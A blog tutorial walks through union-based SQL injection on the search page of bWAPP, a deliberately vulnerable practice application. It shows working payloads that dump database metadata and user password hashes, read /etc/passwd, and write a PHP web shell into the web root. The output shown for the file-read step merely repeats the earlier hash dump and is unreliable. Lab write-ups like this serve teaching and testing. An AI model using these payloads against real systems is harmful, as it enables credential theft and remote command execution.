BWAPP SQL Injection Get/Search

Hi Everyone,

It has been a while since the last post in this blog. I was pretty busy. Today, I want to write a simple SQL Injection that leverage the union based attack to one of the famous application for OWASP 10 exercise

I want to discuss in detailed about this vulnerability that appear at the page sqli_1.php where the problematic code is below

<?php

if(isset($_GET["title"]))
{

    $title = $_GET["title"];

    $sql = "SELECT * FROM movies WHERE title LIKE '%" . sqli($title) . "%'";

    $recordset = mysql_query($sql, $link);

?>

The problem of the code above is that it directly retrieves user input and appends it into the query so that the user can add any string that might affect the original query in the code

Lets have a look to the actual table that the above query will retrieve

We can see that the PHP code will retrieve 7 columns from table movies.

Lets start the doing the SQL injection. To start the initial assessment is by using the very simple test is by putting the ‘ into the box and lets see the problem

The SQL database is giving you a syntax error due to the input with (‘). So what is actually happened at the back. With your input (‘) the PHP code will look like this at the back end

Initial code

SELECT * FROM movies WHERE title LIKE ‘%” . sqli($title) . “%’

After user input

SELECT * FROM movies WHERE title LIKE ‘%’%’

Syntax Error will be thrown when the we execute it directly to the database

To bypass this error, We can pass the input like this ‘– – so that the entire code will look like this

SELECT * FROM movies WHERE title LIKE ‘%’– -%’

The text with red colour will be ignored by the SQL query engine. Lets have a look to the below result, there is no more syntax error

Exploitation

We are going to do exploitation to this vulnerability code by using union select. Why I choose union select because this page allows us to get the data. The first thing to do with the union-based attack is to identify the number of columns affected by the query because union select requires to have the same column as the original query

We can identify by using order by technique and check if the is an error come out. order by 1 is SQL query that allow you to sort the table based on the table number 1

We can increase the column number until the SQL throws an error such as below

We can assume now that the number of the column is less than 8, in this case the column that is affected to the query is 7 that we can verify in the below image

The next step is to find what column are shown to the page. We can use this query to analyse the result

iron’ union select 1,2,3,4,5,6,7– –

We know that not all the column are shown to the page. There are only 4 column that we can use to retrieve data from other table those are 2, 3, 4 and 5

What is actually happening at the backend query when we give input iron’ union select 1,2,3,4,5,6,7– –

The complete query will become like this SELECT * FROM movies WHERE title LIKE ‘%iron’ union select 1,2,3,4,5,6,7– – %’

Below are queries to go further

Getting user of the database

Getting name of the database

Getting the tables name of the database

Getting the users table column name

Extracting value from table users

If you have access to the database directly, here are below the complete SQL query that you can use to learn them

Step 1
SELECT * FROM movies WHERE title LIKE '%iron' order by 7-- - %'

Step 2
SELECT * FROM movies WHERE title LIKE '%iron' union select 1,2,3,4,5,6,7-- - %'

Step 3 (Getting user of database)
SELECT * FROM movies WHERE title LIKE '%iron' union select 1,user(),3,4,5,6,7-- - %'

Step 4 (Getting database name)
SELECT * FROM movies WHERE title LIKE '%iron' union select 1,user(),database(),4,5,6,7-- - %'

Step 5 (Getting Version)
SELECT * FROM movies WHERE title LIKE '%iron' union select 1,user(),database(),4,version(),6,7-- - %'

Step 6 (Getting List of Tables)
SELECT * FROM movies WHERE title LIKE '%iron' union select 1,user(),database(),(select GROUP_CONCAT(table_name,'\n') from information_schema.tables where table_type='BASE TABLE'),version(),6,7-- - %'

Result:
blog,heroes,movies,users,visitors,actions,authmap,batch,block,block_custom,block_node_type,block_role,blocked_ips,cache,cache_block,cache_bootstrap,cache_field,cache_filter,cache_form,cache_image,cache_menu,cache_page,cache_path,comment,date_format_locale,date_format_type,date_formats,field_config,field_config_instance,field_data_body,fiel

Step 7 (Getting List of Column)

SELECT * FROM movies WHERE title LIKE '%iron' union select 1,user(),database(),(select GROUP_CONCAT(column_name,'\n') from information_schema.columns where table_name='users'),version(),6,7-- - %'

Result:
id,login,password,email,secret,activation_code,activated,reset_code,admin,uid,name,pass,mail,theme,signature,signature_format,created,access,login,status,timezone,language,picture,init,data

Step 8 (Extract Value)
SELECT * FROM movies WHERE title LIKE '%iron' union select 1,user(),database(),(select GROUP_CONCAT(login,":",password,"\n") from users),version(),6,7-- - %'

Result:
A.I.M.:6885858486f31043e5839c735d99457f045affd0,bee:6885858486f31043e5839c735d99457f045affd0

Step 8 (File Inclusion)
SELECT * FROM movies WHERE title LIKE '%iron' union select 1,user(),database(),load_file('/etc/passwd'),version(),6,7-- - %'

Result:
A.I.M.:6885858486f31043e5839c735d99457f045affd0,bee:6885858486f31043e5839c735d99457f045affd0

Step 9 (File Write)
SELECT * FROM movies WHERE title LIKE '%iron' union select '','','',(select '<?php echo shell_exec($_GET["cmd"]); ?>' into outfile '/var/www/bWAPP/rio5.php'),'','',''-- - %'


One comment

Leave a Reply to psychocod3r Cancel reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s